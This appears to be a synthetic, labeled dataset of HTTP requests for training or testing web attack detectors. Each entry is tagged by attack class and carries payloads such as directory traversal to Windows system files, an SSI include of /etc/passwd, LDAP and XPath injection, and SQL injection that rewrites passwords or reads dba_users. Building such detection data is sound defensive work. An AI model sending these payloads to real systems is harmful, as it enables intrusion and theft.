If-Unmodified-Since: Wed, 24 Mar 04 06:00:39 CET
If-Match: "mWjASk5s5yn.9oiQOHm_"
If-None-Match: "cikFbziowBrYoz@2@"
Max-Forwards: 372
Pragma: 9='tl2ob'
Referer: http://tasp00i.gov/e1ssou/auIiQaN.tar.gz
TE: trailers,trailers,chunked;q=0.9
User-Agent: Mozilla/5.2 (Windows; U; Windows NT 9.2; ev-er; rv:4.2.3) Gecko/65207716
Transfer-Encoding: deflate
----: -----------------------------------------

si7toyis=1&dtodiv=91958&ntlln9aa=1dog&q9ii=bxE4&boot.iniPH4tScYu=ylb8soh&tj=Rsts&5ny=mgp&heiei1rt7mehi= :ttens>$ Ewgetmui&t2enas=ha&qusrVZw8rjF=5&rDcderesedoe=oeewey 2oottoopen5meta&emeoznvk3gsuet=8753968

End - Id: 40720
Start - Id: 44029
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: www.oobeN.biz
Connection: keep-alive
Accept: application/*;q=0.7, image/*;q=0.8, application/*
Accept-Charset: cp-936, euc-jp;q=0.5, iso-8859-7, x-mac-arabic
Accept-Encoding: *;q=0.7
Accept-Language: 9sausu-hxzR, a-y;q=0.0, jn-4Jd
Cache-Control: no-store
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Wed, 25 Jan 06 18:40:20 GMT
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: 0Vefue9s
From: t8ara@rpmnyne.de
If-Modified-Since: Tue, 03 Oct 06 01:18:37 UTC
If-Unmodified-Since: Mon, 12 Sep 05 24:40:21 UTC
If-Match: *
If-None-Match: "7eJph@gTW85_4iJH"
If-Range: Sun, 28 Feb 10 21:17:34 GMT
Max-Forwards: 7369
MIME-Version: 0.2
Pragma: o='0rOus'
Proxy-Authorization: HwhbDt aamej=aueqawo
Authorization: Basic dGh0Y25hYTo4dGlvU3o=
Range: 67-764741,470518-20,3-202913
Referer: /l1hdes7/e5o6lmp/ibv8.php3
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Accept
User-Agent: Mozilla/7.0 (Windows; U; Win98 0.3; rG-tj; rv:5.0.2) Gecko/85389661
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: gzip
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44029
Start - Id: 45943
class: PathTransversal
GET /zfi/sV.asmx?yeHhN6tvut0o=s&masHan=91&enisunahtt=nie+dt&yfcHchtl=Oemhsemiihza&ncMhendrP8Lldsc=852704&tsde=cfYmsea1&Q_DHXaccess_logo@P=2167650&Blbli=+au0&@RFL3bauj4=6bHhd2soxrom15a&cxohooaaynEum=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&3s=la&tliamexenhbjuh=i%3Bi%40&8aeeaScd9h=1%5Dpk9%40rb HTTP/1.0
Host: 124.251.197.255:7496
Connection: close
Accept: */*
Accept-Charset: iso-8859-1
Accept-Encoding: 
Accept-Language: *
Cache-Control: drdoniob=kj6gh
Client-ip: 81.34.102.44
Cookie: lyThsycaoua=achildeiQ3eval;lerree=56417288
Cookie2: $Version="94"
Date: Mon, 18 May 09 22:24:05 UTC
ETag: "HSlLUZs3qF9UWKYK"
Expect: 100-continue
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Sun, 15 Jan 06 24:41:05 CET
If-Unmodified-Since: Sat, 08 Jul 06 21:39:45 GMT
If-Match: "8O_Jry8.AItLI7WdtC@"
If-None-Match: "8.XDWPTwApOF2QH4@E"
If-Range: Tue, 07 Sep 04 05:31:28 UTC
Max-Forwards: 2
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Hh8ljl hkHpI=asiyO
Referer: http://www.ats3.biz/rtEs/tt0natm/i6er/tbAtei/49rRnn.nsf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.9 (compatible; Konqueror/2.9; Open BSD i386; cu4c6y83kC)
UA-Disp: 3135,8994,8
UA-OS: Mac OS X
Via: 8.5 www.ardtowa4.gif
Transfer-Encoding: telre
Upgrade: Hne/9.3, keht/9.7, eldt/7.3, tlenn/6.0
Warning: 786 71.178.133.86 "gcytuoa0fu2vnqnsqu" "Fri, 19 May 06 24:14:20 CET"
X-Forwarded-For: 226.91.8.34
X-Serial-Number: 15666151508879935432
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 45943
Start - Id: 39609
class: SSI
GET /0rmOau3ab6ptgoee/p4Umt/wintL6bavoEi1Oirus/mha1v34G5fN3M_./hpx0UKyI/aW3S_HOwKHjvWv76/eBl7LW61/ahcmes11iB/bra11Ptes4/er8xp8n.4xoAxEVar/eAZb.eErID.js?qhmn9sfooa=98667&nnK-N3GH3=group+bytnred9a&r6llFocp=771&pzLUE.k0=csp&teyee1O=%3C%21--%23include++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E&KUtQTeyinputtNjlib=0790&etcajxUC=reRwEa HTTP/1.1
Host: 3.77.176.176
Connection: hRshh
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=864
Client-ip: 56.53.233.183
Cookie: Eaobctsxt7h3=rhvc0iPfflgp;fWG29gYhttpsED37=lsstetdnnasnoewem;xsrpeH2Oiba5Eg=lhf8tsHo;nEraead1ty=nlt
Cookie2: $Version="6"
Date: Tue, 03 Aug 04 16:26:59 GMT
ETag: W/"IE2M@YnI7GUSNjVKUu_O"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Sat, 17 Oct 09 07:09:18 CET
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Jan 04 22:36:04 GMT
Max-Forwards: 7
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: yn3o7 beia=nuSE
Authorization: Basic bm91aXR4dHM6dHNZMWVzRTY=
Range: 973-,-4,32221-
Referer: /l89oA/0wnann/nhcrhsN/ucE8eO/tgIr.ace
TE: deflate,gzip
Trailer: Accept-Language
User-Agent: oSflILWPq http://www.prSoak.st
UA-CPU: PowerPC
UA-Disp: 150,287,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1841x260
Via: d2miyr/5.8 www.d0i3piEl.jpg, ldhnVo/8.5 220.160.63.121:47762
Transfer-Encoding: gzip
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 438 147.77.52.61 "asjnh0na0txeitfAswd" "Wed, 19 Nov 08 03:37:46 CET"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39609
Start - Id: 38301
class: LdapInjection
GET /olk6uGhS3a/i8gGt6b/vTdD4yai3u4/Iaui8o/gs/Boo6Abody@WrEH/flIuHK8VBD38-EoQj/iemurlQnl.css?cscrhnae3N=897261667&Sklmnltemrdd98t=8663%29%28%26%28objectClass%3DkooE%29%28%7C%28sn%3D++Ga7r%29%28cn%3Dt+++J*%29%29&eFHVoSQbody3g=fw4&1Fcd2=8tdNlxneaqhgtp&aEee1sa=9&20teuefseclq=87&eWE2l6ezgstao=Eah&skowoenutl=5821&enie0bwelneyje=i%3Ci1emochahimgh7&Ate4cftO=3299&mourtvznez=ebodyn&krdLayehf=2pm HTTP/1.0
Host: 98.10.25.228:80
Connection: close
Accept: audio/*, application/zip;q=0.2
Accept-Charset: x-mac-roman, windows-874;q=0.5, isiri-3342
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 60.169.55.253
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="91"
Date: Sun, 09 Dec 07 08:33:33 GMT
ETag: W/".VbtjpDV.j-vgalLst"
Expect: 100-continue
From: ctbt@euirsarao.st
If-Modified-Since: Sun, 19 Oct 08 04:21:11 CET
If-Unmodified-Since: Mon, 09 Mar 09 03:53:08 CET
If-Match: "cA3hYR6DeOuMMRIhctj"
If-None-Match: "dOZhf4E9qU1BmPkNq"
If-Range: "NbfNS-Q36.5oMT.U"
Max-Forwards: 6528
MIME-Version: 3.2
Pragma: aucrp=stshh
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic NGV0eU9hOnNub3l0c28=
Range: 6717-,60-,18458-657
Referer: /48mah.php
TE: trailers
Trailer: From
User-Agent: drcb3i/3.9.6.9
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 7.2 www.ehaNmpt.tiff:57509, ogI/4.7 97.83.59.110
Transfer-Encoding: gzip
Upgrade: segoo/3.8
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38301
Start - Id: 37060
class: LdapInjection
GET /dFIzS/y7aolp/rMer/7stdnYup5ztete/7k6V.dll?oZvapRetyejrh6=O%2Bn&lIaniy3=hnu1%25H1we&cTl0sx=5190&XVm1inUVsamJv=-ednpheWc3-s%3Bnh&tzQ@L=3588&edpb=+7+tq7os&qoecsB=%29++%28+++%7C%28+++cn%3D*o%27brien*%29%28mail+++%3D*o%27brien*++++%29++&rcpqVG_wHt=4409072&eQOnlmTbin=3 HTTP/1.1
Host: 99.232.167.215
Connection: ceDBO
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 229.87.115.154
Cookie: ule=tsgLrwr
Cookie2: $Version="6"
Date: Wed, 13 May 09 16:33:48 GMT
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Sun, 02 Oct 05 02:56:45 CET
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: "Wi4yUAJqt8.itGnOS7IJ"
Max-Forwards: 497
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic bWFyczpzcm9hb3B1
Range: 03242-,-0
Referer: http://pTr8Ert.biz/EitoHa/tash.js
TE: gzip;q=0.6
Trailer: Pragma
User-Agent: Mozilla/1.8 (compatible; uhddm4s; Win 9x; mslesxspi; hrre7s)
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: HTTP/6.2 www.OpSNh.js, HTTP/7.7 151.99.94.185:30
Transfer-Encoding: gzip
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 0.114.107.58
X-Serial-Number: 595061014884085769
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37060
Start - Id: 48710
class: XPathInjection
POST /bERERP/uIkwaaqs@haX-53RZ2X/dL.h4.PzSXzUDITWc/ln0WYbUHC5z8Swizjdl/fIDmeosianodwnsh3.png? HTTP/1.1
Content-Length: 247
Content-Language: uttd4,gyg
Content-Encoding: deflate
Content-Location: http://www.teeiz.com/f47tgnsa.aspx
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Nov 09 04:54:00 GMT
Host: 125.24.167.91:80
Connection: Hntmcxst
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=652
Client-ip: 193.98.182.250
Cookie2: $Version="63"
Date: Fri, 14 Oct 05 03:30:24 UTC
ETag: "Rcq9up9t0BxEr6w1D"
From: 0Czsri@otpu.uk
If-Modified-Since: Sun, 21 Aug 05 02:50:49 UTC
If-Unmodified-Since: Tue, 21 Nov 06 13:32:42 CET
If-Range: Thu, 25 Dec 08 09:05:04 UTC
Max-Forwards: 8
Pragma: no-cache
Range: -4,59993-18,28-7301
Referer: http://www.hn7l50.st/hnhv/s0ls/iehnp/owtbdb.jpg
TE: gzip
User-Agent: Mozilla/0.4 (Windows; U; Win98 3.6; er-iu; rv:5.5.3) Gecko/77534730
UA-Pixels: 181x2087
Transfer-Encoding: identity
Upgrade: aer/1.4, ieE/6.5, hbq/3.1
X-Serial-Number: 586508390592927979

sn6ehnOafis=u2cezo9t3niE&At=e2gc&rfOadwehe=0&7aXs=era5&caehTozaUOOe=1703323762&wI-qinsertzrht=celiaeaM'  or    dde/r0pa/child::node()[processing-instruction()=431] or  'mmtsa'  ='&d8aeE=im5nned&wgetLttVVvz0form=6805

End - Id: 48710
Start - Id: 48380
class: XPathInjection
GET /Udme1/cekpH3Bqm.asp?acdon2ilnednm6n=hXSv&rvjse=naa+%40oawt+i&SC8tmpc=7268951&7mhae7l=m%3Ci&otyesfeaiilk7=en3ieechoafsrtmpmail&tZt=511687&cEiaexieEbruI=eZKrYhQ4VcX8&OIozG=aODznow4&tcae1bNpyh3lidi=uSolmurshF&cnNtezteaklg=9I9lot1ha&dnre=ocf&Rlv8PH9lGSbD=n%27cjq&9ehat5e=095 HTTP/1.0
Host: 183.252.65.203
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: 85484     or count(path/child::node()[position()=((i+j+k+l+1)]     |     path/child::*()[position()=(k+1)])=1    or    3534=
Cache-Control: no-transform
Client-ip: 242.182.104.226
Cookie: rgpultan=6497446;t44bet3icdhEs=426056;nlih2hseOslac=cq;eicg3ctuO1gdih=whjcvb8
Cookie2: $Version="038"
Date: Thu, 01 May 08 15:44:56 GMT
ETag: W/"if_bhXhq7pmdtzX4R4N"
Expect: etrcit=rdglo;dAazrnm=Yi0l
From: rnjltn@certi8ho.ch
If-Modified-Since: Sat, 24 Jun 06 15:09:37 UTC
If-Unmodified-Since: Mon, 20 Oct 08 16:38:32 GMT
If-Match: "co4.HoTWuqoFpfBJah1j"
If-None-Match: "RA4V5PYto0uopJT8O"
If-Range: Sun, 13 Nov 05 13:49:10 CET
Max-Forwards: 763
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest username="aOiaWnc"
Authorization: NTLM b2FPbXNyQzNka25ydHJzb2x0c2lhM3Bycm10Y2VjZXR5dGl0Z2l2Y3RhYW9leQ==
Referer: /1uyy/ecAibabq/in1eyyA.mpeg
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: ilehcoru
UA-Disp: 0304,7705,8
UA-Pixels: 193x0725
Via: 6.4 www.eatAl.jpeg, ioleeq/9.0 www.inaoste.jpg, FTP/4.3 67.211.171.165
Transfer-Encoding: compress
Upgrade: x7int/9.3, ecge/6.0, 9hOS/7.9, Ipthab/8.6
Warning: 750 www.s5it.tiff "w1tzmadtlta" 
X-Serial-Number: 63375075404459251
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48380
Start - Id: 36191
class: PathTransversal
POST /x3N/se3a0ysmdr6aemmnif/ezYTGDlLtooPFPxD2e/4uyseSmcoKwnh5tDgosN/h1/whof62j0t8zs.png? HTTP/1.0
Content-Length: 233
Content-Language: m
Content-Encoding: identity
Content-Location: /vatgui/SxpauHc/n4pornnh/ronso/u2etoem.nsf
Content-MD5: bW5obmtsZHJyYXRpaW5obw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 05 Feb 10 13:36:23 GMT
Host: 34.17.125.191:80
Connection: geofa
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=58757
Cookie2: $Version="94"
Date: Sat, 01 Apr 06 07:45:29 CET
If-Unmodified-Since: Sun, 31 Aug 08 14:18:05 GMT
If-None-Match: *
If-Range: Wed, 12 Jul 06 03:48:35 GMT
Max-Forwards: 5941
Pragma: no-cache
Referer: http://ehhinv.uk/esds/mrft/cAutshkh/oonaqw7.jpeg
TE: chunked;q=0.7
User-Agent: ../../../../../../../../../WINDOWS/autoexec.bat
UA-OS: Mac OS X
UA-Pixels: 9114x685
Via: 7.9 39.219.11.188
Warning: 299 www.6g9ar.gif:207 "anano4cd9t" "Sat, 22 Dec 07 11:57:51 UTC"

TK4telnet3xtermJsystem=4977&sjl=1hehyte2<[ru ihen&by=rL&ehtnesoden=7C9f6XEh&leoiharWg5=d4&o11muttltRdroN=nArWVi_D&9JhG=58648&7ojcaax60Dcnbps=Setynleuc&DJ3xtermH-UDKeNQ=s8zeBesbiJtmpusr-&dcy8eea=3717&e5yr30bniczl=$e&child6Kx=178

End - Id: 36191
Start - Id: 49148
class: XPathInjection
GET /kGqwcat6YWc9rnph-/aQ/erEU9Wz/268we7hkFIc.ehLfWbB.png?TobeamtTTnec=tniy&ss2N4t=429&ksivotbwE0hbhtn=dSchsuro1h&leosttGto=Nsee%27%5D+++++%7C+++P+++++%7C++++%2F%2Fuser%5B+++++name%2Ftext%28+++%29+%3D++%27hc HTTP/1.1
Host: www.Bsonrres.ch
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-2022-kr, big5, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 204.49.188.29
Cookie: ofendeo=4;Mkqof=audirXytk1ldresI0m
Cookie2: $Version="3"
Date: Sun, 14 Jan 07 06:45:24 GMT
ETag: "HjF@45Djy@lcchXqG"
Expect: cnapd=5nhiuzm;etnii
From: lrSasae@aaar.net
If-Modified-Since: Fri, 19 Aug 05 09:57:37 UTC
If-Unmodified-Since: Sat, 21 Jul 07 15:28:10 UTC
If-Match: "u--9xGQjsdwj@EN"
If-None-Match: *
If-Range: "3miaK7@A4S7iBbjS"
Max-Forwards: 3
MIME-Version: 0.8
Pragma: lU5tl=y
Proxy-Authorization: rtra9 ieayrnr8=mdixsqo
Authorization: hhoen nmCrg=ecche
Range: 4916-
Referer: http://rmyedtt.net/njta5n/ahap/9mguk/89rEfSS/eaGm.php3
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 6.2; oh-pa; rv:1.2.5) Gecko/18619664
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: FTP/3.4 212.40.5.91:50280
Transfer-Encoding: compress
Upgrade: oredo/3.8, 9ele/6.1
Warning: 384 www.rticla.shtml:33631 "lrerokniaeoes" "Wed, 18 Jan 06 05:57:49 CET"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49148
Start - Id: 40336
class: SSI
GET /eybh3nV_TAh@/eagKg/wE3i/1YyAAP0nX/ot/xtermguVFJ_/zi/st_06_oVg/SWJdpjAjY.jpeg?5wbheRUP=%3C%21--%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5CiooY%5Cdmy%5Cal.exe++d%3A%5Cseii7oo%5Cwww.meitieorme.org%5Ctdege7rh%5Cdatabase.mdb+%2Fx+++exporttofoxpro%22--%3E&BOrNj.@usru7o=991&jtu5ithtm=+ehres&bwnetpgmie=pr+mt0ot&-xsock_streamFW5lc=7eofastr7ut&rneueoosrlo=b%29ocn-sn%28%24likeis6ct HTTP/1.1
Host: www.dtreheoaee.be:82
Connection: otrjte
Accept: */*
Accept-Charset: windows-874, windows-1251
Accept-Encoding: gzip, gzip;q=0.6, gzip;q=0.5, deflate;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 21.250.170.182
Cookie: tmpdpu8-Ch=7ae
Date: Sat, 11 Apr 09 17:06:10 CET
ETag: "-2SnMmPGNUPDo6afli"
Expect: 100-continue
If-Modified-Since: Wed, 13 Sep 06 04:53:14 UTC
If-Unmodified-Since: Sat, 22 Aug 09 09:37:43 GMT
If-Match: "958Yxp8OHNYMUwIy8e"
If-None-Match: *
If-Range: Sun, 18 May 08 24:34:33 CET
Max-Forwards: 99
MIME-Version: 3.8
Pragma: ooiz1cte=oirtuz
Proxy-Authorization: Digest response="294CCE866907f6d2817d414d28f0AeF8"
Authorization: 6qdzgt erewsi=rneh8a
Range: -681198,453389-53032,-61223
Referer: http://neila65.de/trltt/ae7oi/eurn/hvdg.zip
TE: deflate
User-Agent: oezhixshdn (rylJ1t; ivY7fk3; 5zNqkkMSqH; eMyamqAFTT; 4P7oDH)
UA-CPU: StrongARM
UA-Disp: 041,313,32
UA-Color: color8
UA-Pixels: 384x228
Via: HTTP/2.0 221.89.128.117
Transfer-Encoding: deflate
Upgrade: ogu/6.9, nh0i/0.5, njHtk/8.8, I6inrl/2.9, Eflir/9.1
Warning: 563 www.ptln.png:756 "oeoaCord" "Sat, 26 Mar 05 04:53:57 GMT"
X-Forwarded-For: 42.162.17.85
X-Serial-Number: 22985

null

End - Id: 40336
Start - Id: 41376
class: SqlInjection
PUT /xMpY_AP/a1OUr3nbBiaGLUT.sv/hfA2pW.wlk3Jx0lk6/oVXJvKwn0Z2Wd6Wc-/ueseuceo/6yahCekVTobjectgVBupdate/R97i/hN-Vkrl_/KvaH9.js? HTTP/1.1
Content-Length: 376
Content-Language: n7ftgsee,detdfm1e,re
Content-Encoding: gzip
Content-Location: /enloae/deaht6.htm
Content-MD5: MkxlZ2VzdWVNZ3htMXMybw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Dec 08 12:19:46 GMT
Last-Modified: Mon, 31 Jul 06 05:35:08 CET
Host: www.idonE9Wh.cz:80
Connection: close
Accept: text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: waT4b='zl'
Client-ip: 204.103.21.248
Cookie: mg9ehlxch9ul=tii%krMtmbdrope dminH;me=ry2raaxe@1cnneqlEwu;iheooos5=5kucorrr;4aeahsnd3BAc1=mSq-
Cookie2: $Version="6"
Date: Sun, 21 Mar 04 15:50:53 CET
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Sun, 16 Oct 05 11:50:51 UTC
If-Unmodified-Since: Sat, 10 Oct 09 07:06:07 GMT
If-Match: "HxGiDB9@4Gw-ZbHh"
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 2.2
Pragma: rese='cOsc'
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: NTLM ZVNkNTFPaGFlb2FOcWo3ZWxycXF1bGhTbjMzYnRPNmc5aWt4bXBFSWVuY3dlb3Vu
Range: 002769-,52-
Referer: /ceepgaee/Spcnelc9/etrSEp.mdb
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: p5eiuoRi/7.0.1
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2355x6440
Via: FTP/7.5 www.igeitv.png, 7.7 www.dtefhrhk.png
Transfer-Encoding: compress
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

iuUurgzonRrsse=87407015&vegni=mhavingnv&ijehw1=locationoO2O&d5=hphrI~irm&eoOzlsnhrh5ma=s0Jt&roT=prHny&e2CRrn=;alter table  netrsivell set     password    =  'ngx'     where name     =  '8t1ha';&yskno0hg=3qIzLM&ksseresITt6b=ys=iwcn8s&othe4=ygq9C&varjFBlemLF-JV=9504943&fnannurt=lplinkp6alupdateIlocation&taeghi=0osvostyleis&Ueemijw=eaoa&trual0owi=srtdfeoeer

End - Id: 41376
Start - Id: 41842
class: SqlInjection
GET /nyErekucjis/wTp/pFcZfpTFow7V_E_36/oGi0ztsK22RV4ovSJ/ar79vJ_EIlJ.mdb?lS.DSvdropyR5W6=seeaTinene4En&uaErmeo8g5pi=+t&xn=aamEm%27++++UNION++++%2F**%2F+++++SELECT+++it+++FROM++dba_users+++WHERE+++sle+++like+%27%2525&RhR@Nretcprocessing-instructionjQ=v%3F&wr8odnloiierr=ag51prnnerw&sZeil95v=506008&5esun5pehmi=6&e48te=57 HTTP/1.0
Host: www.7Esgd1p.com
Connection: aaTormsl
Accept: application/*;q=0.4, text/plain, image/*
Accept-Charset: koi8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 196.90.56.27
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Thu, 14 Jul 05 23:33:46 GMT
ETag: "Pcy6CIpDuU4di8br"
Expect: 3esf
From: rhserwr@eoSaan.it
If-Modified-Since: Sun, 17 Sep 06 13:50:27 GMT
If-Unmodified-Since: Sat, 01 Jan 05 21:53:37 UTC
If-Match: "wpeagd3IDuXBc1YC"
If-None-Match: *
If-Range: "Uwh5z.l.LfcAi4HSGr"
Max-Forwards: 37
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: heea seltmfr=o7On
Range: -0842
Referer: http://tefxt.com/NwUoi.zip
TE: trailers,gzip,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/3.4 (Windows; U; WinNT 3.3; sS-ta; rv:6.9.2) Gecko/39139285
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/7.0 www.sdiMcdb.jpg:7, 3.0 246.96.49.78
Transfer-Encoding: identity
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 905 112.14.120.88 "oDrineNkeu" "Sat, 31 Jan 04 09:06:11 UTC"
X-Forwarded-For: 187.70.226.8
X-Serial-Number: 431124702375
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41842
Start - Id: 38666
class: LdapInjection
GET /HiyeInr/syGKaPNC6e7w@v/M6in/aoI1k/ndahbceee0tectj/awg4/qac6qakkiilydnih/Oe/fw6.html?LMmusFV=4573292&n68scai=rNRMpf_u0N&OentafoerE=eif%29%28++%7C%28Tamhe%3D*%29&eQ=463&0d69V=mi&hevalVT9ZO=iTaIQo-4&JONmtr=3&vUctpza2=isniW&pt=44306362&Cmetnroufuzytm=8616368&kNu9=H4en3eee HTTP/1.0
Host: 137.235.17.230
Connection: 1mehtua
Accept: */*
Accept-Charset: euc-jp, euc-tw;q=0.4, iso-8859-5, windows-1255;q=0.5, euc-jp;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=41362
Client-ip: 4.62.251.210
Cookie: jstnlrs7hrdl=Ilza ed p9Seta;umhaa2= o@c]ett;ARral=6;rsshirnNthk2en=ehecz8g%+;phesWiedveamB=12720541;uAyteo=748
Cookie2: $Version="129"
Date: Fri, 06 Jun 08 15:18:47 CET
ETag: W/"O9@O-jxY9.LjYLQO"
Expect: sztaie94
From: 0dbnE@pDEweao.biz
If-Modified-Since: Mon, 29 Mar 10 10:46:39 CET
If-Unmodified-Since: Tue, 16 Jun 09 22:18:01 CET
If-Match: *
If-None-Match: "NeoD1gfKW@JvORts_pF"
If-Range: Wed, 02 Sep 09 01:28:03 CET
Max-Forwards: 41
MIME-Version: 9.7
Pragma: no-cache
Authorization: ar0yxt ehNhei=mtatep
Range: -3789,-5,300-00360
Referer: http://sonahil.be/nsdets3/eeeF/mumetarn/vN6l8NTt/scaon.php3
TE: gzip,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.1 (compatible; Konqueror/8.3; WinNT; Xuleeakcm; bionoqfyeo; fgkeoa)
UA-OS: Solaris
UA-Pixels: 7709x7356
Via: FTP/3.0 208.12.187.225:949, FTP/0.3 www.sdac88.shtml, 7.2 249.114.24.59:801
Transfer-Encoding: gzip
----: -------------------

null

End - Id: 38666
Start - Id: 45700
class: PathTransversal
GET /lDpuco.pl?srrttoyteyg=i%3Crrg3+%27ucc%24&I3iEQaccess_logoptFJw=smaoe&yitnS=pmochaSti+ee%24%3D&cmjnwtiosaOa=%5Cautoexec.bat&nnst=rA&hisrgFi8=6737063&irbt=nZ9oSTTYk_H&cieaors2dmri=stIrnli&P_4pgalltmpkhN6=3233082913&zIcstyleYgBS8adminetcS=c-Wld0&glFLLFNUu5UV=49822578&0uiuarrrlnrtit=465&awAwepomdtsA=lLr-&o2feffttwsEjt1e=3740&eenogedhm=i_E5fzk HTTP/1.0
Host: 149.183.136.50:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, koi8;q=0.0, x-mac-chinesetrad, hz-gb-2312;q=0.6, iso-8859-9
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: max-age=91368
Client-ip: 23.236.107.29
